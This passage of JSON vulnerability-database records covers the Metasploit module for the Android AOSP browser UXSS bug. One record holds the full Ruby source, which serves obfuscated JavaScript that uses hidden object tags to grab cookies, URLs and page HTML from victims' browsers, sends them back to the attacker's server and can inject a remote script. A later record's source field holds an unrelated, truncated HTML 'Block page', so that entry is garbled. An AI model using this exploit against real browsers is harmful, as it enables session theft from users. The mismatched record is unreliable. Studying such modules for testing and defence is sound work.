exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T19:41:49", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-06T11:41:02", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-07-06T11:41:02"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310852608"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32952"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}], "modified": "2019-07-06T11:41:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T11:41:02", "differentElements": ["sourceData"], "edition": 83}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-06T13:36:19", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-07-06T13:36:19"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310852609"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32952"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}], "modified": "2019-07-06T13:36:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T13:36:19", "differentElements": ["sourceData"], "edition": 84}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "2d09754ccb929cab1bcefa40f9d1ecc9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-17T22:47:50", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-07-17T22:47:50"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:92972EAF9D82078A646C89FF655246FA"]}, {"type": "schneier", "idList": ["SCHNEIER:96A2F50F6F033D167626C5A4E1D165EB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704482", "OPENVAS:1361412562310891853", "OPENVAS:1361412562310704481", "OPENVAS:1361412562310704480", "OPENVAS:1361412562310704479", "OPENVAS:1361412562310815247", "OPENVAS:1361412562310891852", "OPENVAS:1361412562310891850", "OPENVAS:1361412562310704478", "OPENVAS:1361412562310891851"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153627"]}, {"type": "exploitdb", "idList": ["EDB-ID:47120"]}], "modified": "2019-07-17T22:47:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<meta charset=\"utf-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\t\t<title>Block page</title>\n\t\t<link rel=\"stylesheet\" type=\"text/css\" href=\"https://kliksafestoppagina.kliksafe.nl/2017ns/css/Font/Fonts.css\">\n\t\t<link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.8.2/css/all.css\" integrity=\"sha384-oS3vJWv+0UjzBfQzYUhtDYW+Pj2yciDJxpsK1OYPAYjqT085Qq/1cq5FLXAZQ7Ay\" crossorigin=\"anonymous\">\n\t\t<style>\n\t\t\thtml,body \t{\n\t\t\t\t\t\tbackground-color:#444;\n\t\t\t\t\t\tcolor:#FFF;\n\t\t\t\t\t\theight: 100%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tpadding: 0px;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tfont-size: 20px;\n\t\t\t\t\t\t}\n\t\t\t.header \t{\n\t\t\t\t\t\theight: 50%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tbackground: url('